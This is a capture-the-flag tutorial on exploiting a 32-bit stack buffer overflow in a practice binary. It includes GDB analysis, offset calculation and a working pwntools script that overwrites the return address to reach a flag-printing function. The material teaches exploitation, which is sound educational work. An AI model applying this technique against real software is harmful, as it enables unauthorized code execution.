BINEX: Stack Exploits · IronForgeCyber

Practice 2

Try a 32-bit overflow! The approach is the same as on 64-bit, except that addresses are 4 bytes wide, so they get packed with p32 instead of p64.
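To make the difference concrete, here is a minimal sketch that uses Python's standard struct module as a stand-in for pwntools. With pwntools' default little-endian setting, p32(x) gives the same bytes as struct.pack("<I", x), and p64(x) the same bytes as struct.pack("<Q", x). The address is only an example value (it is the address of win found later in this walkthrough).

```python
import struct

ADDR = 0x08049196  # example 32-bit address (win, found later in this walkthrough)

packed32 = struct.pack("<I", ADDR)  # same bytes pwntools' p32(ADDR) returns by default
packed64 = struct.pack("<Q", ADDR)  # same bytes pwntools' p64(ADDR) returns by default

print(len(packed32), packed32.hex())  # 4 bytes, least significant byte first
print(len(packed64), packed64.hex())  # 8 bytes, the upper half is zero padding
```

On a 32-bit target the extra four zero bytes from the 64-bit packing would spill into the next stack slot, which is why the width matters.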

If you look at the challenge solution, note that it was written for an older version of the challenge. That version reads input with gets(), which is unrealistic because every compiler strongly warns against using it. The modernized version uses read(), a system call that many real-life binaries use.

The Solution

Same challenge, different architecture.

Checking Security

Let's make the first security check using checksec.

[*] '/ironforge/chall'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

The first and probably most important thing is that this is a 32-bit binary. This means that parameters are passed on the stack: when call is reached, the top of the stack is the first parameter, the next slot is the second parameter, and so on.

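We see that there is no stack canary and no PIE, although NX is enabled and RELRO is partial. The most important result for the buffer overflow is that the canary is disabled. The lack of PIE also helps, because function addresses stay the same on every run.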

Let's go into GDB and find where this function takes input. Inside read_in:

0x080491fc <+59>:    push   0x40
0x080491fe <+61>:    lea    eax,[ebp-0x30]
0x08049201 <+64>:    push   eax
0x08049202 <+65>:    push   0x0
0x08049204 <+67>:    call   0x8049040 <read@plt>

We see that this program uses read for input. The man page says this about read:

SYNOPSIS
       #include <unistd.h>

       ssize_t read(int fd, void buf[.count], size_t count);

DESCRIPTION
       read() attempts to read up to count bytes from file descriptor fd into the buffer starting at buf.

In this case, read is offered 0x30 bytes of space to write, but allows the user to write 0x40 bytes. This is a buffer overflow vulnerability! This is the vulnerability that we are going to exploit.
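The size mismatch can be worked out with a few lines of arithmetic. This is a minimal sketch that assumes the usual i386 frame layout (saved ebp stored at [ebp], return address at [ebp+4]); the walkthrough confirms that layout in GDB further down. The constant names are made up for illustration.

```python
BUF_OFFSET_FROM_EBP = 0x30  # buffer starts at ebp-0x30 (lea eax,[ebp-0x30])
READ_COUNT = 0x40           # third argument pushed for read()
WORD = 4                    # pointer size on i386

# How many bytes read() may write beyond the space below ebp.
overflow = READ_COUNT - BUF_OFFSET_FROM_EBP
print(f"bytes written past the buffer region: {overflow}")

# Assumed layout: saved ebp at [ebp], return address at [ebp+4].
reaches_saved_ebp = overflow >= WORD
reaches_return_address = overflow >= 2 * WORD
print(reaches_saved_ebp, reaches_return_address)
```

Under those assumptions the extra 16 bytes are enough to cover both the saved base pointer and the return address.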

Now that both vulnerability prerequisites have been checked, let's start figuring out how to execute the buffer overflow.

Disassembly

Let's do our analysis in GDB assuming that we don't have the source code (because, typically, we won't), and only refer to the source to explain why things happen.

First, we check the functions available:

gef➤  info functions
All defined functions:

Non-debugging symbols:
0x08049000  _init
0x08049030  __libc_start_main@plt
0x08049040  read@plt
0x08049050  fflush@plt
0x08049060  puts@plt
0x08049070  system@plt
0x08049080  _start
0x080490ad  __wrap_main
0x080490c0  _dl_relocate_static_pie
0x080490d0  __x86.get_pc_thunk.bx
0x080490e0  deregister_tm_clones
0x08049120  register_tm_clones
0x08049160  __do_global_dtors_aux
0x08049190  frame_dummy
0x08049196  win
0x080491c1  read_in
0x08049212  main
0x08049252  __x86.get_pc_thunk.ax
0x08049258  _fini

The three functions that we are interested in are win, read_in, and main. win logically appears to be the target, so let's figure out what happens there:

gef➤  disas win
Dump of assembler code for function win:
   0x08049196 <+0>:     push   ebp
   0x08049197 <+1>:     mov    ebp,esp
   0x08049199 <+3>:     push   ebx
   0x0804919a <+4>:     sub    esp,0x4
   0x0804919d <+7>:     call   0x8049252 <__x86.get_pc_thunk.ax>
   0x080491a2 <+12>:    add    eax,0x2e52
   0x080491a7 <+17>:    sub    esp,0xc
   0x080491aa <+20>:    lea    edx,[eax-0x1fec]
   0x080491b0 <+26>:    push   edx
   0x080491b1 <+27>:    mov    ebx,eax
   0x080491b3 <+29>:    call   0x8049070 <system@plt>
   0x080491b8 <+34>:    add    esp,0x10
   0x080491bb <+37>:    nop
   0x080491bc <+38>:    mov    ebx,DWORD PTR [ebp-0x4]
   0x080491bf <+41>:    leave
   0x080491c0 <+42>:    ret

win makes a call to system, which the man page says takes a char* (string) argument. From the source code, we see that the argument is "cat flag.txt", meaning that it opens the flag file and prints its contents.

Why is the program doing this?

Since the program doesn't want to hardcode the flag, it stores it in a separate file (that isn't provided). This is a common technique to prevent people from just running strings on the binary to find the flag.

Now, let's check main:

gef➤  disas main
Dump of assembler code for function main:
   0x08049212 <+0>:     lea    ecx,[esp+0x4]
   0x08049216 <+4>:     and    esp,0xfffffff0
   0x08049219 <+7>:     push   DWORD PTR [ecx-0x4]
   0x0804921c <+10>:    push   ebp
   0x0804921d <+11>:    mov    ebp,esp
   0x0804921f <+13>:    push   ebx
   0x08049220 <+14>:    push   ecx
   0x08049221 <+15>:    call   0x80490d0 <__x86.get_pc_thunk.bx>
   0x08049226 <+20>:    add    ebx,0x2dce
   0x0804922c <+26>:    call   0x80491c1 <read_in>
   0x08049231 <+31>:    sub    esp,0xc
   0x08049234 <+34>:    lea    eax,[ebx-0x1fb8]
   0x0804923a <+40>:    push   eax
   0x0804923b <+41>:    call   0x8049060 <puts@plt>
   0x08049240 <+46>:    add    esp,0x10
   0x08049243 <+49>:    mov    eax,0x0
   0x08049248 <+54>:    lea    esp,[ebp-0x8]
   0x0804924b <+57>:    pop    ecx
   0x0804924c <+58>:    pop    ebx
   0x0804924d <+59>:    pop    ebp
   0x0804924e <+60>:    lea    esp,[ecx-0x4]
   0x08049251 <+63>:    ret

We see that main just appears to call read_in and then return. So, let's go check read_in:

Dump of assembler code for function read_in:
   0x080491c1 <+0>:     push   ebp
   0x080491c2 <+1>:     mov    ebp,esp
   0x080491c4 <+3>:     push   ebx
   0x080491c5 <+4>:     sub    esp,0x34
   0x080491c8 <+7>:     call   0x80490d0 <__x86.get_pc_thunk.bx>
   0x080491cd <+12>:    add    ebx,0x2e27
   0x080491d3 <+18>:    sub    esp,0xc
   0x080491d6 <+21>:    lea    eax,[ebx-0x1fdc]
   0x080491dc <+27>:    push   eax
   0x080491dd <+28>:    call   0x8049060 <puts@plt>
   0x080491e2 <+33>:    add    esp,0x10
   0x080491e5 <+36>:    mov    eax,DWORD PTR [ebx-0x4]
   0x080491eb <+42>:    mov    eax,DWORD PTR [eax]
   0x080491ed <+44>:    sub    esp,0xc
   0x080491f0 <+47>:    push   eax
   0x080491f1 <+48>:    call   0x8049050 <fflush@plt>
   0x080491f6 <+53>:    add    esp,0x10
   0x080491f9 <+56>:    sub    esp,0x4
   0x080491fc <+59>:    push   0x40
   0x080491fe <+61>:    lea    eax,[ebp-0x30]
   0x08049201 <+64>:    push   eax
   0x08049202 <+65>:    push   0x0
   0x08049204 <+67>:    call   0x8049040 <read@plt>
   0x08049209 <+72>:    add    esp,0x10
   0x0804920c <+75>:    nop
   0x0804920d <+76>:    mov    ebx,DWORD PTR [ebp-0x4]
   0x08049210 <+79>:    leave
   0x08049211 <+80>:    ret

We see that this is where read() is called and where we will overflow the buffer. We also notice that malloc() has yet to be called, meaning that the data is not being placed on the heap.

To confirm this, we check what's being passed to read(). Let's set a breakpoint right before the call to read() and check:

gef➤  x/3wx $esp
0xffffce70:     0x00000000      0xffffce88      0x00000040

x/3wx $esp (or pxw @ esp in radare2) shows the three values on top of the stack. In 32-bit, this is how parameters are passed. Reading them in order: 0x00000000 is the file descriptor (stdin), 0xffffce88 is the address of the buffer, and 0x00000040 is the byte count.
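As a small illustration of how those three words map onto read(int fd, void *buf, size_t count), the sketch below decodes the same 12 bytes the way they sit in little-endian memory. The raw byte string is reconstructed by hand from the GDB output above, so treat it as an example rather than a memory dump.

```python
import struct

# The 12 bytes at esp, written out as they sit in little-endian memory.
raw = bytes.fromhex("00000000" "88ceffff" "40000000")

# Three unsigned 32-bit little-endian words: first, second, third parameter.
fd, buf, count = struct.unpack("<3I", raw)
print(f"read(fd={fd}, buf={buf:#x}, count={count:#x})")
```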

Something peculiar that we notice is that 0xffffce88 (the location we're writing to) is close to the stack pointer (0xffffce70). I wonder, are we writing to the stack? The short answer is yes, but let's confirm. Run info proc mappings or vmmap (dm in radare2) to check the bounds of the various memory segments:

gef➤  vmmap 0xffffce88
[ Legend:  Code | Heap | Stack ]
Start      End        Offset     Perm Path
0xfffdd000 0xffffe000 0x00000000 rw- [stack]

We see that our stack is located between 0xfffdd000 and 0xffffe000. Our buffer address is inside this range, meaning we are writing to the stack.
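The same check can be written down as a one-line range test. This is just a sketch with the numbers copied from the vmmap output above; the variable names are illustrative.

```python
STACK_START, STACK_END = 0xfffdd000, 0xffffe000  # from the vmmap output
BUF = 0xffffce88                                 # second argument to read()

# The mapping covers [start, end): the end address itself is excluded.
in_stack = STACK_START <= BUF < STACK_END
print(in_stack)
print(f"{STACK_END - BUF:#x} bytes below the end of the mapping")
```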

What power do we have?

Remember that read() was told to accept up to 0x40 bytes, which is more than the buffer can hold? read() has no idea how big the buffer really is, so the extra bytes land on whatever sits above it. There are some important things on the stack right now, so let's go check them out.

gef➤  x/20wx $esp
0xffffce70:     0x00000000      0xffffce88      0x00000040      0x080491cd
0xffffce80:     0xf7ffcfd8      0x00000028      0x00000000      0xffffdfa9
0xffffce90:     0xf7fc8570      0xf7fc8000      0x00000000      0x00000000
0xffffcea0:     0x00000000      0x00000000      0x00000000      0x00000000
0xffffceb0:     0xffffffff      0x0804bff4      0xffffcec8      0x08049231

This looks like a lot of gibberish, but two numbers stand out in particular:

gef➤  x/wx 0xffffce7c
0xffffce7c:     0x080491cd
gef➤  x/wx 0xffffcebc
0xffffcebc:     0x08049231

Why these two? The short answer is that these numbers look different from the rest! If we check the memory mappings again, we see:

gef➤  vmmap 0x080491cd 0x08049231
[ Legend:  Code | Heap | Stack ]
Start      End        Offset     Perm Path
0x08049000 0x0804a000 0x00001000 r-x  /ironforge/chall

This is executable memory located inside the challenge binary. This is the text segment. This means that these values are addresses in the code. Let's check what's here:

gef➤  x/i 0x080491cd
   0x80491cd <read_in+12>:      add    ebx,0x2e27
gef➤  x/i 0x08049231
   0x8049231 <main+31>: sub    esp,0xc

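We see that these both point to instructions. The first one points near the top of read_in: it is a stale return address left behind by the call to __x86.get_pc_thunk.bx at read_in+7, and it sits below our buffer, so we can't reach it. The second one points back into main, right after the call to read_in: this is the return pointer. The value stored just before it, 0xffffcec8, is the saved base pointer (ebp).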

Let's understand how this happened.

Stack Frame

When a function is called, the following happens:

The return pointer is pushed onto the stack. This is the address of the next instruction to execute after the function returns.
The code then goes to the location referenced in the call instruction.
The base pointer is pushed onto the stack. This saves the caller's base pointer so it can be restored later. We see that here in the code:

Dump of assembler code for function read_in:
   0x080491c1 <+0>:     push   ebp
   0x080491c2 <+1>:     mov    ebp,esp
   0x080491c4 <+3>:     push   ebx
   0x080491c5 <+4>:     sub    esp,0x34

The stack pointer is copied into the base pointer. This is the new base pointer.
The stack pointer is moved down to make space for local variables.
The function is executed.

When the function returns, the following happens:

   0x0804920c <+75>:    nop
   0x0804920d <+76>:    mov    ebx,DWORD PTR [ebp-0x4]
   0x08049210 <+79>:    leave
   0x08049211 <+80>:    ret

leave is shorthand for mov esp, ebp ; pop ebp. This returns the base and stack pointers to their values before they were modified in the prologue. This resets the stack frame to the stack frame of the calling function.
The return pointer is popped off the stack and the code jumps to that location. (alias: pop eip)
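The call and return steps above can be sketched as a toy model in Python. This is not an emulator: memory is a plain dict of 4-byte slots, the starting register values are inferred from the GDB dumps in this walkthrough, and the helper names push and pop are made up for illustration.

```python
# Toy model of i386 call / prologue / epilogue; memory is a dict of 4-byte slots.
mem = {}
regs = {"esp": 0xffffcec0, "ebp": 0xffffcec8, "eip": 0x0804922c}  # inside main

def push(value):
    regs["esp"] -= 4
    mem[regs["esp"]] = value

def pop():
    value = mem[regs["esp"]]
    regs["esp"] += 4
    return value

# call read_in: push the address of the next instruction, then jump.
push(0x08049231)
regs["eip"] = 0x080491c1

# Prologue: push ebp; mov ebp,esp; push ebx; sub esp,0x34
push(regs["ebp"])
regs["ebp"] = regs["esp"]
push(0x0804bff4)           # saved ebx (value seen in the stack dump)
regs["esp"] -= 0x34

# Epilogue: leave (mov esp,ebp; pop ebp), then ret (pop eip)
regs["esp"] = regs["ebp"]
regs["ebp"] = pop()
regs["eip"] = pop()

print({name: hex(value) for name, value in regs.items()})
```

In this model the saved base pointer ends up at 0xffffceb8 and the return pointer at 0xffffcebc, matching the stack dump, and ret simply trusts whatever value is stored in that slot.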

How do we leverage this?

We know that the return pointer is at some location in memory. When we call read_in, we subtract from the stack pointer.
We will write some number of bytes inside the space that was just allocated for the function.
If we write enough bytes (because the program isn't checking), we can overwrite the return pointer placed on the stack.
Without knowing any better, when the function terminates, it will find where it stored the return pointer and go there. It does not verify that the return pointer is a valid place in memory or that it's the same one it stored initially; it just goes there.
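The steps above can be sketched with a byte array standing in for the part of the stack between the buffer and the return pointer. The addresses come from the GDB output; fake_read, store32, and load32 are hypothetical helpers that only imitate the relevant behavior of read(), not the real system call.

```python
import struct

BUF, FRAME_END = 0xffffce88, 0xffffcec0   # buffer start, one past the return pointer
frame = bytearray(FRAME_END - BUF)

def store32(addr, value):
    struct.pack_into("<I", frame, addr - BUF, value)

def load32(addr):
    return struct.unpack_from("<I", frame, addr - BUF)[0]

store32(0xffffceb8, 0xffffcec8)   # saved base pointer
store32(0xffffcebc, 0x08049231)   # return pointer into main

def fake_read(data, count=0x40):
    # Like read(): copy up to `count` bytes without knowing the buffer's real size.
    n = min(len(data), count, len(frame))  # the model only covers len(frame) bytes
    frame[:n] = data[:n]

fake_read(b"A" * 56)
print(hex(load32(0xffffcebc)))   # the return pointer now holds our bytes
```

Nothing in this model (or in the real program) compares the return pointer against its original value before using it.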

Let's make this happen.

Exploitation

We are still stopped at the breakpoint on the call to read(). Let's check the stack again:

gef➤  x/3wx $esp
0xffffce70:     0x00000000      0xffffce88      0x00000040

The second value, 0xffffce88, is the address we are going to write to. As a reminder, this is where we found the return pointer:

gef➤  x/wx $esp+0x4c
0xffffcebc:     0x08049231

This means that in order to overwrite the return pointer, we need to write from 0xffffce88 to 0xffffcebc. How many bytes is this? Let's get some Python practice:

gef➤  !python3 -c "print(0xffffcebc-0xffffce88)"
52

This means that we need to write 52 bytes of padding, and then the next four bytes overwrite the return pointer. But where do we want to go? The win function! Let's get that address:

gef➤  info functions win
All functions matching regular expression "win":

Non-debugging symbols:
0x08049196  win
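Before building the payload, the 52-byte offset can be cross-checked against the disassembly. This is a small sketch, assuming the standard frame layout described in the Stack Frame section (saved ebp at [ebp], return pointer at [ebp+4]); both numbers should agree.

```python
BUF_ADDR = 0xffffce88  # second argument to read(), seen on the stack
RET_ADDR = 0xffffcebc  # where the return pointer 0x08049231 is stored

offset_from_gdb = RET_ADDR - BUF_ADDR

# From the disassembly: the buffer is at ebp-0x30, the saved ebp occupies [ebp],
# and the return pointer follows at [ebp+4].
offset_from_disassembly = 0x30 + 4

print(offset_from_gdb, offset_from_disassembly)
```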

Let's use Python to make this a payload:

$ python3 -c "print('A' * 52 + str(0x08049196))"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA134517142

And what happens when we run this?

$ ./win32
Can you figure out how to win here?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA134517142
Segmentation fault (core dumped)

We… crashed. What does that mean? Either we corrupted memory or we tried to execute memory that we weren't allowed to. Let's retry this in GDB and watch the execution:

[#0] Id 1, Name: "win32", stopped 0x35343331 in ?? (), reason: SINGLE STEP

It's saying that it reached the address 0x35343331 and stopped. What does this mean?

We now know that we control execution and were able to successfully divert it to another spot in memory.
We didn't quite do it right because we didn't get to the win function. We need to figure out what happened.

Let's dive deeper into what is happening here:

We notice that 0x35343331 is made of the bytes 0x31 0x33 0x34 0x35, the ASCII characters "1345", which is the start of the number in our payload. The bytes appear reversed because x86 is a little-endian architecture.
We also notice that 134517142 is the decimal form of 0x08049196, which is the address of win. We sent the address as text digits instead of as four raw bytes.
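The difference between the digits we sent and the bytes the CPU needs can be seen side by side. This is a minimal sketch using only the standard library; struct.pack("<I", ...) is used here as a stand-in for the raw 4-byte little-endian encoding.

```python
import struct

WIN = 0x08049196  # address of win

as_text = str(WIN).encode()        # ASCII digits, what str(addr) puts in the payload
as_bytes = struct.pack("<I", WIN)  # the four raw bytes the CPU expects

print(as_text, as_bytes)

# ret only consumes the first four bytes that land on the return pointer.
loaded = int.from_bytes(as_text[:4], "little")
print(hex(loaded))
```

The value loaded from the text version is the same address the crash reported, while the packed version decodes back to the address of win.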

How can we get the hexadecimal to appear correctly in the payload?

This is where pwntools comes in. Pwntools has packing functions that convert a number into raw bytes of the correct size and byte order. It also gives us a way to send this payload to the binary. Consider the following exploit:

from pwn import *

p = process("./chall")

payload = b"A" * 52
payload += p32(0x08049196)

p.sendline(payload)
p.interactive()

Let's break this exploit down:

from pwn import * -- This imports the pwntools library into the program, just like an #include in C-type languages.
p = process('./chall') -- This creates a process object that runs the chall binary.
payload = b"A" * 52 -- This creates a variable containing 52 bytes of A characters. Note that you could use any characters, but A (0x41) is a common choice.
payload += p32(0x08049196) -- This packs 0x08049196 (the address of win) as a 32-bit little-endian byte string. This is appended to our padding.
p.sendline(payload) -- This sends the payload to the process.
p.interactive() -- This allows us to interact with the process after sending the payload.
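As a sanity check on the payload itself, the sketch below rebuilds the same bytes without pwntools and verifies two things: that everything fits inside the 0x40 bytes read() will accept, and that the four bytes at offset 52 decode back to the address of win. struct.pack stands in for p32 here, and the constant names are illustrative.

```python
import struct

OFFSET = 52        # padding up to the return pointer
WIN = 0x08049196   # address of win
READ_COUNT = 0x40  # most bytes read() will accept

payload = b"A" * OFFSET + struct.pack("<I", WIN)  # struct stands in for p32 here
sent = payload + b"\n"                            # sendline appends a newline

print(len(payload), len(sent) <= READ_COUNT)
print(hex(struct.unpack_from("<I", payload, OFFSET)[0]))
```

If the offset were larger than 60, the address would no longer fit inside what read() accepts, and this approach would not work as written.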

Let's run this exploit:

$ python3 asd.py
[+] Starting local process './chall': pid 777254
[*] Switching to interactive mode
Can you figure out how to win here?
IFC{PL4C3H0LD3R_FL4G_H3R3!}
[*] Got EOF while reading in interactive
$
[*] Process './chall' stopped with exit code -11 (SIGSEGV) (pid 777254)
[*] Got EOF while sending in interactive

We have our flag!
